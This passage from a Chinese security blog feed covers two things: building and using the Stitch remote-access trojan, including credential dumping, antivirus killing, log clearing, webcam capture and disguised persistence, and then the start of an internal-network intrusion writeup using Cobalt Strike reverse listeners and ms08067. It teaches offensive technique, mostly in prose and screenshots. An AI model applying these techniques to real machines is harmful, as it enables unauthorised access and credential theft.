src="https://wechat2rss.xlab.app/img-proxy/?k=fa11a46b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kib8FZHBGbLnKEpXdmcwe56icC3TibPKh8DfHMJgszDlF16bsTFicrFyoCTg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 5px 16px;"><br/></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">没关系，多试几次就好了，不知道是不是我强行创建x86目录安装NSIS的原因。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"></span><img class="" data-copyright="0" data-ratio="0.5384615384615384" data-s="300,640" style="" data-type="png" data-w="676" src="https://wechat2rss.xlab.app/img-proxy/?k=76c665bb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kibAcF6kOajXoKyRFFhACic8icaLyNzLHsQa9qDEF5icfJfwKGrbnqLaTqtA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 5px 16px;"><br/></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">Configx目录当中payloadconfig.log之外的8个exe文件就是创建好的绿色单文件版payload，而“NSIS Installers”目录当中8个exe就是对应的安装版payload。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">这里有个比较奇怪的地方，同样也是没找到原因。就是绿色单文件版payload当中的chrome.exe，它的<strong>图标会时有时无</strong>，但是并不影响正常上线和上线后的功能。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(39, 39, 39);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(39, 39, 39);"></span><img class="" data-copyright="0" data-ratio="0.5460526315789473" data-s="300,640" style="" data-type="png" data-w="456" src="https://wechat2rss.xlab.app/img-proxy/?k=c21b7d22&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kibwYAb317J8gOiarW5iboaZNlbbrniaJP7I06Q7TFTjcC0Efrhjv5bJiaKvw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(39, 39, 39);"></span><br/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 24px;color: rgb(0, 122, 170);">• 操作</span><span style="font-size: 15px;"></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">生成payload的之后就是对目标机器上线之后的功能测试了，可以说作者在github下面介绍的几个亮点功能都可以实现。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"></span><img class="" data-copyright="0" data-ratio="0.242152466367713" data-s="300,640" style="" data-type="png" data-w="669" src="https://wechat2rss.xlab.app/img-proxy/?k=5dec8a83&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kib0aZIPc2icTCrvuqb4ScTozlvU71nV3WRBfNcL0foFbRK563V23PW5Eg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 5px 8px;"><img class="" data-copyright="0" data-ratio="0.5623003194888179" data-s="300,640" style="" data-type="png" data-w="626" src="https://wechat2rss.xlab.app/img-proxy/?k=c19c4e4d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kib8AUsJ4VorgUtKdPSagVfIDXDrOn3w4p8KtyPicojeKymQFZCufic1vVw%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">有新的机器连接时stitch这里会提示。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"></span><img class="" data-copyright="0" data-ratio="0.242152466367713" data-s="300,640" style="" data-type="png" data-w="669" src="https://wechat2rss.xlab.app/img-proxy/?k=5dec8a83&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kib0aZIPc2icTCrvuqb4ScTozlvU71nV3WRBfNcL0foFbRK563V23PW5Eg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 5px 16px;"><br/></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">获得会话shell之后，输入“help”获得帮助信息</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"></span><img class="" data-copyright="0" data-ratio="0.8353293413173652" data-s="300,640" style="" data-type="png" data-w="668" src="https://wechat2rss.xlab.app/img-proxy/?k=8e249755&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kibfBJ8y5Sk79QG3ubI7D4KiagicxhZTzlF2NTLgMlqtOy6MAM3Aby6C5FA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 5px 16px;"><br/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(91, 90, 90);">同样只对一些不怎么常见的命令做个个人理解版的解释。</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;"><br/></span></p><blockquote style="margin: 1.2em 0px;border-left: 4px solid rgb(221, 221, 221);padding: 0px 1em;color: rgb(119, 119, 119);quotes: none;"><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong><span style="font-size: 15px;">Askpassword</span></strong></span><span style="font-size: 15px;"><strong><span style="font-size: 15px;color: rgb(73, 68, 68);"></span></strong><span style="font-size: 15px;color: rgb(73, 68, 68);">：在目标机器弹出一个很逼真的对话框，要求输入当前用户账号密码，不输入的话会不停的弹。</span></span><span style="color: rgb(73, 68, 68);font-size: 15px;text-decoration: underline;">不过有点遗憾的是即使输入错误，这个对话框仍然会关掉</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>Avscan、avkill</strong></span><span style="font-size: 15px;color: rgb(73, 68, 68);">：扫描和干掉杀毒软件 <br/></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>Chromedump</strong></span><span style="font-size: 15px;color: rgb(73, 68, 68);">：把保存于chrome浏览器当中的所有密码都dump出来</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>Clearev</strong></span><span style="font-size: 15px;color: rgb(73, 68, 68);">：清除目标机器系统、安全、应用事件日志 <br/></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>Disablexxx</strong></span><span style="font-size: 15px;color: rgb(73, 68, 68);">：分别是禁掉RDP、UAC和Windows defender功能</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>Displayon、off</strong></span><span style="font-size: 15px;color: rgb(73, 68, 68);">：打开和关掉屏幕 <br/></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>Drives</strong></span><span style="font-size: 15px;color: rgb(73, 68, 68);">：列出所有的硬盘以及简要情况 <br/></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>Editxxx</strong></span><span style="font-size: 15px;color: rgb(73, 68, 68);">：编辑文件的访问、创建和修改时间</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>Environment</strong></span><span style="font-size: 15px;color: rgb(73, 68, 68);">：列出详细的环境变量 <br/></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>Firewall</strong></span><span style="font-size: 15px;color: rgb(73, 68, 68);">：对防火墙状态或者规则做出修改</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>Freeze</strong></span><span style="font-size: 15px;color: rgb(73, 68, 68);">：冻结对方的屏幕，经过测试三键仍然可以调出任务管理器，但是也会立即冻结，很有趣 <br/></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 15px;">Hashdump</span></strong></span><span style="font-size: 15px;color: rgb(73, 68, 68);">：dump出保存在系统当中的哈希</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>Hide</strong></span><span style="color: rgb(73, 68, 68);font-size: 15px;">：隐藏文件或者文件夹 Hostsfile：对目标机器hosts文件进行操作</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>Location</strong></span><span style="color: rgb(73, 68, 68);font-size: 15px;">：根据目标机器ip进行定位，功能测试似乎无效 Lockscreen：锁屏，等同于win+L <br/></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>Popup</strong></span><span style="color: rgb(73, 68, 68);font-size: 15px;">：弹个框</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>Pyexec</strong></span><span style="color: rgb(73, 68, 68);font-size: 15px;">：python版本的psexec，在对方系统运行python脚本，但是只能是python脚本 <br/></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong><span style="font-size: 15px;">Scanreg</span></strong></span><span style="font-size: 15px;"><strong><span style="font-size: 15px;color: rgb(73, 68, 68);"></span></strong><span style="font-size: 15px;color: rgb(73, 68, 68);">：列出注册表状况</span></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>Screenshot</strong></span><span style="color: rgb(73, 68, 68);font-size: 15px;">：截取当前屏幕 Vmscan：判断当前环境是否为虚拟机 <br/></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong><span style="font-size: 15px;">Webcamxxx</span></strong></span><span style="font-size: 15px;"><strong><span style="font-size: 15px;color: rgb(73, 68, 68);"></span></strong><span style="font-size: 15px;color: rgb(73, 68, 68);">：列出并使用摄像头拍照</span></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>Wifikeys</strong></span><span style="color: rgb(73, 68, 68);font-size: 15px;">：查看连接过的无线的密码</span></p></blockquote><p><br/></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">骗人的框框</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"></span><img class="" data-copyright="0" data-ratio="0.554559043348281" data-s="300,640" style="" data-type="png" data-w="669" src="https://wechat2rss.xlab.app/img-proxy/?k=e56a5c8e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kibbZfibWmiaYKTxyibtGW2fwMFgsExtDFugkEkPib1xvKRedcia72Iss4tojA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 5px 16px;"><br/></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">可以通过网络连接状况看到各个模块间的通信情况。Install版本的上线时间会稍长，因为它运行后需要一定的时间把启动服务写入目标机器，最终也会只留下一个通信程序，和下面相同的效果。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"></span><img class="" data-copyright="0" data-ratio="0.3191489361702128" data-s="300,640" style="" data-type="png" data-w="799" src="https://wechat2rss.xlab.app/img-proxy/?k=c51b3677&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kibY52lXqgKkaEZqgkdqThHR2t16FFYhuxKqCMJpFMHQ3dqYmYQs30cLA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 5px 16px;"><br/></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">通过沙箱我们可以看到stitch是通过cmd、powershell以及一个自带的elevate.exe对启动服务发生了强行py。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"></span><img class="" data-copyright="0" data-ratio="0.5895196506550219" data-s="300,640" style="" data-type="png" data-w="687" src="https://wechat2rss.xlab.app/img-proxy/?k=a4ba96de&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kib21PAgJIbIqBLib5XV3edaBtYR3j7TqctBJ5d4PozalagDZf4XPNrh7w%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(91, 90, 90);">最终也是只剩下一个写在“c:\windows\syswow64\google\”目录中的“chrome.exe”在猥琐运行。</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(91, 90, 90);"></span></p><p style="margin: 5px 8px;"><img class="" data-copyright="0" data-ratio="0.34171597633136097" data-s="300,640" style="" data-type="png" data-w="676" src="https://wechat2rss.xlab.app/img-proxy/?k=97340cbb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kibj9NhWSHFlvwz2srvuOrnMpicYoRTeDicbskktBu56vN9m2dFbUSVW9dw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(91, 90, 90);">个人认为这是一款很优秀的程序，linux版本的实验顺风顺水，甚至<strong>在u2b看到国外的黑阔们“pip install -r”之后直接忽略掉关于PIL的报错</strong>，总之要比win简单得多。至于osx穷人我就没法测试了，应该和linux区别不会太大。</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);">文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;"><br/></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;"><br/></span></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><p style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 5px 8px;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;"><strong>msvcp90.dll控件下载地址</strong>：<br/><a href="http://99idc.jb51.net:81/dll/msvcp90.rar" target="_blank">http://99idc.jb51.net:81/dll/msvcp90.rar</a><strong><br/>PIL参考</strong>：<br/><a href="http://blog.csdn.net/heatdeath/article/details/69664216" target="_blank">http://blog.csdn.net/heatdeath/article/details/69664216</a><strong><br/>Machinery参考</strong>：<br/><a href="https://blog.qiyuange.net/?p=123" target="_blank">https://blog.qiyuange.net/?p=123</a><strong><br/>py2exe 0.6.9 下载地址</strong>：<br/><a href="http://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/" target="_blank">http://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/</a><br/><strong>pyHook下载地址</strong>：<br/><a href="https://sourceforge.net/projects/pyhook/" target="_blank">https://sourceforge.net/projects/pyhook/</a><strong><br/>Pywin32下载地址</strong>：<br/><a href="http://99idc.jb51.net:81/201601/tools/pywin32_2.7(jb51.net).rar" target="_blank">http://99idc.jb51.net:81/201601/tools/pywin32_2.7(jb51.net).rar</a><br/><strong>NSIS下载地址</strong>：<br/><a href="http://nsis.sourceforge.net/Download" target="_blank">http://nsis.sourceforge.net/Download</a><strong><br/>参考文章</strong>：<br/><a href="http://www.freebuf.com/sectool/129104.html" target="_blank">http://www.freebuf.com/sectool/129104.html</a></span></p></pre><p style="margin: 0px 0px 1.2em !important;"><br/></p><hr/><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;"><br/></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;"></span></p><p><img class="" data-copyright="0" data-cropselx1="0" data-cropselx2="558" data-cropsely1="0" data-cropsely2="314" data-ratio="0.5626373626373626" style="width: 558px;height: 314px;" data-type="gif" data-w="910" src="https://wechat2rss.xlab.app/img-proxy/?k=fcad10a4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2F4iacC3bS3Zh1BVB32BoazNN6jCuUQr99dYgO44tCAcEyEiaU5LpJvHwOWo0pbJtXRq2KtZwTxUW8DvK4DicqY60NA%2F640%3Fwx_fmt%3Dgif"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;"></span><br/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;">*封面图片自Google图片采集，版权归misucell.com所有。其他图片均为原创。<br/></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;">*未经授权请勿转载。<br/></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;">*文章写于2017年12月，现在的bypass效果请自测。<br/></span></p>



<p><a href="2247483775">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=6212b254&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU1NDYxMTE5OA%3D%3D%26mid%3D2247483775%26idx%3D1%26sn%3D23574a8d21135f59ed4a85bd1340c684%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 19 Feb 2018 18:36:00 +0800</pubDate>
    </item>
    <item>
      <title>记一次借助Cobalt Strike进行的简单内网渗透</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU1NDYxMTE5OA==&amp;mid=2247483771&amp;idx=1&amp;sn=60c1b512574de0184182814f35946cdd</link>
      <description>一次借助Cobalt Strike进行的简单内网渗透测试，写一下当做重温一遍过程，也当做自己的笔记。</description>
      <content:encoded><![CDATA[<p>
原创 <span>m82a1</span> <span>2018-02-07 18:39</span> <span style="display: inline-block;"></span>
</p>

<p>一次借助Cobalt Strike进行的简单内网渗透测试，写一下当做重温一遍过程，也当做自己的笔记。</p>


<p style="margin-bottom: 0px;letter-spacing: 0.578px;text-wrap: wrap;text-align: center;margin-left: 8px;margin-right: 8px;">
<img src="https://wechat2rss.xlab.app/img-proxy/?k=3619b6a4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyhQquA0hmVvGCGpicv1icOI3Kyw0qDvM9cQFTMOwAovDlYWiaHVMdnTo6w%2F0%3Fwx_fmt%3Djpeg"/>
</p>

<p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span></p><p><img class="" data-copyright="0" data-ratio="0.4166666666666667" style="" data-type="gif" data-w="480" src="https://wechat2rss.xlab.app/img-proxy/?k=51a2f7f3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2F4iacC3bS3Zh3d0c3xAGybIzA4vB7QqiamDwSftiaxsqFKoAdDqeLuyFzCt6iadoz7kw7HSzvS97UwaZqF3AfaDkbOQ%2F640%3Fwx_fmt%3Dgif"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">一直觉得自己对于这款工具的使用还差的很多，能做的仅仅是简单的拿鼠标点几下，甚至连点几下的功夫都练得不怎么明白。文章权当一次学习过程中的笔记，水平辣鸡导致疏漏和缺陷在所难免，欢迎提出批评和指正。</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">就从获得第一台winserver2003权限之后写起，通过web获得administrator权限添加账号进入服务器发现已经有很多人来过了，还有个小可爱的账号是“t00ls”。</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">我修补了出问题的地方，删掉了他们的账号。另外一开始的时候这台机器上是装了MSE的，很烦，哪有这么多免杀的东西给你造，直接卸载掉了。</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">好的，清完障碍，文章就开始了。</span></p><p style="margin: 0px 0px 1.2em !important;"><strong><span style="color: rgb(0, 122, 170);font-size: 20px;"><span style="color: rgb(0, 122, 170);">• </span>0X01 内网疑云</span></strong></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">登陆的时候目测是有域环境存在的，”Log on to:” 那里两个选项，一个是域的名称，一个是电脑的名称，我添加的用户必然不是域用户，所以只能选择普通登陆。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.575" data-s="300,640" style="" data-type="png" data-w="520" src="https://wechat2rss.xlab.app/img-proxy/?k=950fa817&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyxA72KVC00sWJ0Et3azL5KPKkiaVQPbtaNC6ucBLHGObAH0CLZ6icQoHQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">常规操作，查看网络环境（其实正常来说第一步是去黑客们账号的桌面文件夹和敏感文件夹看看有没有什么0day和神器什么的）。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.7746268656716417" data-s="300,640" style="" data-type="png" data-w="670" src="https://wechat2rss.xlab.app/img-proxy/?k=84743a3b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMy6nMUiciawECj658ReSpVYhdfje3pdQxLelg7bRiaIRMicUxWhpdgTsmt1Q%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.18195488721804512" data-s="300,640" style="" data-type="png" data-w="665" src="https://wechat2rss.xlab.app/img-proxy/?k=772600ef&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMycoIvruvMJM4RzSYnic76NIgmAibV2XD0bnv2erhTdib0XNMedtn8Tu89A%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.8554033485540334" data-s="300,640" style="" data-type="png" data-w="657" src="https://wechat2rss.xlab.app/img-proxy/?k=2bcfa7cf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMygwfkwuH1diaWJ7Idt33iaJXKCNfWv4ckpFgNeqTXpBYkOrKRdAY9AHcg%2F640%3Fwx_fmt%3Dpng"/><br/><span style="font-size: 15px;color: rgb(73, 68, 68);">似乎存在域环境，但是“net view”却提示服务没有启动，尝试“net start server”等启动服务未果。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.4962630792227205" data-s="300,640" style="" data-type="png" data-w="669" src="https://wechat2rss.xlab.app/img-proxy/?k=bb63a33f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyibzVXIUhFpX6tG85DKZyKibrGLZAQPfuqJ8z3gMwtVrhTTanu1yR8okQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">其实一开始对这个域环境的存在是抱着怀疑态度的，但是从登录界面来看应该是存在的，所以我先把机器弹到了cobalt strike（下文简称cs）上面。</span></p><blockquote style="margin: 1.2em 0px;border-left: 4px solid rgb(221, 221, 221);padding: 0px 1em;color: rgb(119, 119, 119);quotes: none;"><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">另：当时我最开始使用的是cs2.x，先用ms08067拿下了172.16.3.1，但是后面发现cs2.x的mimikatz抓密码有问题，抓出来的结果和3.x有出入处不说，抓完有时候机器还会关机<br/>==！，所以我后面就切换成3.x操作。下面的过程全部是使用cs3.8进行演示的，2.5版本的使用附在了最后面。个人感觉3.x的版本相对于2.x而言也确实有其进步之处。</span></p></blockquote><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">对于cs的teamserver配置环节有很多文章介绍，这里我不再赘述。服务端启动完成之后，<strong>首先要设置一个listener</strong>，类型的选择看环境情况和个人习惯。因为目标环境简单（我也比较懒），我设置的常规http的reverse类型。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.6319444444444444" data-s="300,640" style="" data-type="png" data-w="1152" src="https://wechat2rss.xlab.app/img-proxy/?k=6c4dcd21&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyKLgSn2ol5rlon4TFk46nZOaHJ6IOr2q5C2Vk6nNjUMOWoiadn5I7ZWQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"><strong>其次再生成一个简单的payload</strong>，也是常规类型。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.42358803986710963" data-s="300,640" style="" data-type="png" data-w="602" src="https://wechat2rss.xlab.app/img-proxy/?k=3fd7169e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMy4RIWSrSibZShVHVj1o5PprslxQFdWftiamxwMUUQG4KvmmBrTO5r2ngQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">“listener”选择创建好的监听器，“output”选择要创建的payload类型。其中“Windows EXE”与“Windows service EXE”的区别是前者只是简单的一个独立payload，exit之后不会重新上线，但是<strong>service这个需要且只能使用系统命令 sc create创建一个系统服务，服务创建成功之后重启还会上线</strong>，其中区别接近rat的绿色版和安装版的区别（service问题请教于vexs师傅）。因为这里只是利用该机器对内网进行渗透，所以选择“Windows EXE”。<br/>对于需要x64格式的可以勾选“x64”后面的勾。再下面的数字签名功能似乎是专业版才可以使用的功能。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.6459459459459459" data-s="300,640" style="" data-type="png" data-w="370" src="https://wechat2rss.xlab.app/img-proxy/?k=423676a8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyG5exiaJRx9XSxwsg00ED5FoeMLCNt1OMHdck3Ty8bpCZwKxGCv8uqWw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">生成完毕之后可以放到web环境里再转移到靶机上，我图省事直接3389copy过去，双击运行。至此，战场正式转移到cs上。</span></p><p style="margin: 0px 0px 1.2em !important;"><strong><span style="font-size: 20px;color: rgb(0, 122, 170);">• 0X02 柳暗花明</span></strong></p><blockquote style="margin: 1.2em 0px;border-left: 4px solid rgb(221, 221, 221);padding: 0px 1em;color: rgb(119, 119, 119);quotes: none;"><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">Cs自3.0版本以后，已经不再依存于msf的框架，而是以自己独有的模块作为一个独立的平台工作。事实上两种模式也是各有千秋。2.X的版本可以直接调用msf的各种模块进行操作，很方便，但是因为版本问题，它本身的功能有限是他的瓶颈。而3.0以后功能确实要强大，但是如果需要msf操作时要使用<br/>“foreign” 类型的listener把会话中转到msf上面。</span></p></blockquote><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.8644578313253012" data-s="300,640" style="" data-type="png" data-w="332" 